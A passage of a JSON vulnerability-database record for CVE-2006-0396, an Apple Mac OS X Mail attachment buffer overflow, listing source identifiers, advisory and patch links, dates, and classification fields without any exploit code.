"id": "APPLE-SA-2006-03-13",
"trust": 0.6
},
{
"db": "XF",
"id": "25209",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "1583",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-16504",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2006-0396",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "44647",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "PACKETSTORM",
"id": "44647"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"id": "VAR-200603-0281",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-16504"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T21:03:29.802000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "17081",
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17081"
},
{
"title": "id?1015762",
"trust": 0.8,
"url": "http://securitytracker.com/id?1015762"
},
{
"title": "19129",
"trust": 0.8,
"url": "http://secunia.com/advisories/19129"
},
{
"title": "article",
"trust": 0.8,
"url": "http://docs.info.apple.com/article.html?artnum=303453"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://docs.info.apple.com/article.html?artnum=303453"
},
{
"trust": 2.7,
"url": "http://www.kb.cert.org/vuls/id/980084"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2006/mar/msg00001.html"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/17081"
},
{
"trust": 1.8,
"url": "http://www.digitalmunition.com/dma%5b2006-0313a%5d.txt"
},
{
"trust": 1.8,
"url": "http://www.osvdb.org/23872"
},
{
"trust": 1.8,
"url": "http://securitytracker.com/id?1015762"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/19129"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
},
{
"trust": 1.2,
"url": "http://www.vupen.com/english/advisories/2006/0949"
},
{
"trust": 1.2,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
},
{
"trust": 0.9,
"url": "http://www.digitalmunition.com/dma[2006-0313a].txt"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0396"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19129/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-0396"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/0949"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/427601/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/25209"
},
{
"trust": 0.4,
"url": "http://www.apple.com/macosx/"
},
{
"trust": 0.3,
"url": "/archive/1/427601"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/vulnerabilities/apple-osx-mail-cve-2006-0396"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/1583/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/"
},
{
"trust": 0.1,
"url": "http://rfc.net/rfc1740.html"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "PACKETSTORM",
"id": "44647"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "PACKETSTORM",
"id": "44647"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-17T00:00:00",
"db": "CERT/CC",
"id": "VU#980084"
},
{
"date": "2006-03-14T00:00:00",
"db": "VULHUB",
"id": "VHN-16504"
},
{
"date": "2006-03-14T00:00:00",
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"date": "2006-03-13T00:00:00",
"db": "BID",
"id": "17081"
},
{
"date": "2014-03-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"date": "2006-03-14T22:24:53",
"db": "PACKETSTORM",
"id": "44647"
},
{
"date": "2006-03-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"date": "2006-03-14T11:02:00",
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-29T00:00:00",
"db": "CERT/CC",
"id": "VU#980084"
},
{
"date": "2018-10-19T00:00:00",
"db": "VULHUB",
"id": "VHN-16504"
},
{
"date": "2018-10-19T00:00:00",
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"date": "2006-03-15T12:15:00",
"db": "BID",
"id": "17081"
},
{
"date": "2014-03-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"date": "2006-03-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"date": "2024-11-21T00:06:21.873000",
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability",
"sources": [
{
"db": "BID",
"id": "17081"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.6
}
}